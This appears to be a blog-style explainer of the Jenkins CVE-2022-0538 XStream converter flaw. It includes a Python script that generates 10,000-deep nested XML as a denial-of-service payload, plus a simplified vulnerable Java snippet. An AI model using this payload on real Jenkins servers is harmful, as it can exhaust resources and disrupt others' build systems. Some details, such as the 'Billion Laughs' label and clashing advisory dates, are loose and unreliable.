CVE-2022-0538 - How Jenkins' Custom XStream Converters Opened the Door to Unconstrained Resource Exploits

Jenkins is a popular, open-source automation server used for building, deploying, and automating software projects. If you use Jenkins, you probably trust it with your code and your data. But what happens when a vulnerability arises in such a crucial tool? This post covers CVE-2022-0538, a security issue that affected Jenkins versions 2.333 and earlier and LTS 2.319.2 and earlier, and explains, in plain language, how this bug leaves your server open to *unconstrained resource usage* — meaning an attacker can hog memory and processing power, possibly causing denial of service attacks.

We’ll dig into how the bug works, what code is affected, how to exploit it, and—if you’re a Jenkins admin—how to protect yourself.

What is CVE-2022-0538?

Jenkins uses a library called XStream to convert data between Java objects and XML. Think of it as a translator: if Jenkins wants to save or load a complex Java object structure to XML, XStream handles the job.

In security, it’s often dangerous to allow user input to control how things get deserialized (turned from XML or another format into in-memory objects), because someone could sneak in nasty payloads. In December 2021, a bug called CVE-2021-43859 forced XStream to tighten protections against these attacks. XStream itself was fixed, but Jenkins internally uses custom versions of some XStream “converters” (the parts responsible for handling particular data types). Unfortunately, Jenkins didn’t update its own custom converters to add the new safety checks.

This means malicious users could send special data that causes Jenkins to eat up lots of memory or processor cycles, causing resource exhaustion (*denial of service*), or maybe worse.

References

- Original Jenkins security advisory
- CVE Details CVE-2022-0538
- XStream CVE-2021-43859 details

Let’s look at a simplified example.

Normally, XStream limits how deeply it will parse nested XML data, and how big the resulting Java objects can get. This *limits risk*. Jenkins’ custom converters weren’t updated to add these limits.

Exploitable Example: “Billion Laughs” Attack

The classic Billion Laughs attack is a way to make XML processing balloon out of control using self-referential entities.

With XStream, something similar — say, deeply nested or recursive XML representing complex objects — can eat up all your server’s memory.

Take a look at a simplified version of Jenkins’ unsafe deserialization

// Jenkins custom converter set up
XStream xstream = new XStream();
xstream.registerConverter(new CustomJenkinsConverter());
// (Note: Insecure! Lacks the protections from XStream’s patch)

// XML submitted by attacker:
String evilXML =
    "<map>" +
      "<entry>" +
        "<string>key</string>" +
        "<value>" +
          "<value>" +
            "... (thousands of deeply nested <value> tags) ..." +
          "</value>" +
        "</value>" +
      "</entry>" +
    "</map>";

Object result = xstream.fromXML(evilXML); // Server hangs, OOMs, or worse!

Jenkins’ custom converter tries to turn this into Java objects, with no checks.

- The parser chews up lots of CPU and memory, eventually consuming all available resources; other tasks are starved, server crashes, or slows to a crawl.

How To Exploit (Proof of Concept)

If you have *any* way to submit XML data processed through Jenkins’ vulnerable APIs, you can exploit this bug. For example, submitting job configuration files, or abusing certain REST endpoints, depending on permissions and installation specifics.

Python script to generate the malicious XML

def generate_deep_xml(depth):
    xml = "<value>"
    for _ in range(depth):
        xml = f"<value>{xml}</value>"
    xml += "</value>"
    return f"<map><entry><string>key</string>{xml}</entry></map>"

with open('evil.xml', 'w') as f:
    f.write(generate_deep_xml(10000))

Then submit evil.xml to a vulnerable endpoint.

## How To Fix / Mitigate

- Upgrade! Jenkins fixed this in Jenkins 2.334 and LTS 2.319.3.

Summary

CVE-2022-0538 underscores the risk of *custom code not keeping up with dependency security*. Even with XStream patched, Jenkins’ own converters left a back door wide open. If you run Jenkins, *patch now* and review any other plugins or customizations that may bypass upstream safety checks.

References

- Jenkins Advisory 2022-02-15 / SECURITY-2599
- NVD: CVE-2022-0538
- CVE-2021-43859 (XStream security update)


*Original, exclusive analysis by ChatGPT. Please share and stay secure!*

Timeline

Published on: 02/09/2022 14:15:00 UTC
Last modified on: 02/11/2022 20:44:00 UTC